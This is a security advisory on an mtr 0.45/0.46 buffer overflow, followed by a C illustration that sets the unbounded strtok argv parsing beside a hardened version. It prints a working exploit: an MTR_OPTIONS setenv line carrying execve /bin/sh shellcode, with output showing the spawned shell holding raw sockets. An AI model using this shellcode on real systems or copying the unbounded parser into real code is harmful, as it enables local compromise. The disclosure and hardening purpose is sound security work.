COMMAND

    mtr buffer overflow

SYSTEMS AFFECTED

    mtr 0.45, 0.46

PROBLEM

    Przemyslaw Frasunek [http://www.frasunek.com/] says:

    The sample exploit is TRIVIAL because of the strtok/while loop in the vulnerable code.

        clitoris:/home/venglin/mtr-0.45> uname -smr
        Linux 2.4.8-26mdk i686
        clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
        clitoris:/home/venglin/mtr-0.45> ./mtr
        sh-2.05$

    At this point, the exec'd shell has a raw socket opened:

        clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
        sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
        sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
        sh-2.05$ ls -la /proc/self/fd/
        total 0
        dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
        dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
        lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
        lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
        lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
        lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
        lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
        lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd

SOLUTION

    Upgrade to latest patch level (as of 07 March 2002)
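The strtok/while loop pattern behind this class of overflow, shown as an added C example that is a reconstruction of the pattern and not mtr's own source: an environment string is split into a fixed-size argv table with no bound on the index, next to the bounded version that NULL-terminates the table and reports truncation to the caller. MAX_ARGS, the function names, and the token counts are assumptions chosen for illustration; the sample strings are constructed in the block.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed argv table; an assumed value for illustration. */
#define MAX_ARGS 128

/* Builds a constructed options string of n tokens ("A A A ..."), standing in
 * for a value read from an environment variable. Caller frees the result. */
static char *make_tokens(int n)
{
    char *s = malloc((size_t)n * 2 + 1);
    if (s == NULL)
        return NULL;
    for (int i = 0; i < n; i++) {
        s[2 * i] = 'A';
        s[2 * i + 1] = ' ';
    }
    s[2 * n] = '\0';
    return s;
}

/* Vulnerable pattern (reconstruction, not mtr's code). Every token strtok()
 * returns is stored at argv[argc++] with no check against MAX_ARGS, so a
 * string with more than MAX_ARGS - 1 tokens writes pointers past the end of
 * the table into whatever the compiler placed after it on the stack. Kept
 * here only for comparison; never call it on untrusted input. */
static int parse_options_unsafe(char *string, char *argv[MAX_ARGS])
{
    int argc = 1;
    argv[0] = "prog";
    for (char *p = strtok(string, " \t"); p != NULL; p = strtok(NULL, " \t"))
        argv[argc++] = p;                /* unbounded index */
    return argc;
}

/* Hardened form: the loop stops when the table is full (leaving room for a
 * NULL sentinel), the table is always NULL-terminated, and overflow of the
 * table is reported as a truncation flag instead of silently tolerated. */
static int parse_options_safe(char *string, char *argv[MAX_ARGS], int *truncated)
{
    int argc = 1;
    argv[0] = "prog";
    *truncated = 0;
    for (char *p = strtok(string, " \t"); p != NULL; p = strtok(NULL, " \t")) {
        if (argc >= MAX_ARGS - 1) {
            *truncated = 1;
            break;
        }
        argv[argc++] = p;
    }
    argv[argc] = NULL;
    return argc;
}

int main(void)
{
    char *argv[MAX_ARGS];
    int truncated;

    /* 130 tokens, the same count the advisory's sample uses, exceeds the table */
    char *oversized = make_tokens(130);
    int argc = parse_options_safe(oversized, argv, &truncated);
    printf("safe parser: argc=%d truncated=%d\n", argc, truncated);
    if (truncated)
        fprintf(stderr, "refusing oversized options string\n");
    free(oversized);

    /* a normal-sized string parses identically in both versions */
    char *small = make_tokens(5);
    argc = parse_options_safe(small, argv, &truncated);
    printf("safe parser: argc=%d truncated=%d\n", argc, truncated);
    free(small);
    small = make_tokens(5);
    argc = parse_options_unsafe(small, argv);
    printf("unsafe parser on small input: argc=%d\n", argc);
    free(small);
    return 0;
}
```

The caller of the hardened parser should treat a set truncation flag as an error and exit rather than run with a partial option set: in a setuid binary, the environment is attacker-controlled input, and a silently truncated parse is still a parse of data the program had no reason to trust. Dropping privileges (or the raw sockets) before any such parsing limits what an exec'd shell would inherit, which the lsof output above shows was not done here.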